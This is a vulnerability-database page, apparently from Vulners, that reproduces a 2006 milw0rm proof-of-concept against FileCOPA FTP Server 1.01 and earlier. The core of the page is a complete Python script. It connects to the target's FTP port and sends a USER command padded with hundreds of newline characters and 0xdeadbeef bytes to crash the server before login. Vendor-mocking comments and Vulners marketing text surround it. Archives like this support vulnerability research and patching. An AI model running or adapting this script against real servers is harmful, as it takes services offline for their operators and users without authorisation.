Vulners
Lucene search
FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS
### FILECOPA DOS
### www.filecopa.com
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer
### http://blacksecurity.org
### They are selling this software for $39.95...
### oh well.. maybe they shoud fix it first?
#
# It appears that FileCopa does not handle alot of new line char
# in the USER login. This is in the filecpnt.exe file.
#
# This is only a DOS, that kills the ftp process
import sys,os,string
import socket
import struct
import time
print "-------------------------------"
print "- FileCopa DOS"
print "- Found by: bigeazer"
print "- Should have crashed FileCopa"
print "-------------------------------"
buffer = "\x0a" * 248 + struct.pack('<L',0xdeadbeef) * 960
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect((sys.argv[1],21))
except:
print "- Unable to connect. exiting."
sys.exit(1)
d = s.recv(1024)
time.sleep(1)
s.send('USER %s\r\n' % buffer)
time.sleep(1)
sys.exit(0)
# milw0rm.com [2006-05-05]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 May 2006 00:00Current
7.1High risk
Vulners AI Score7.1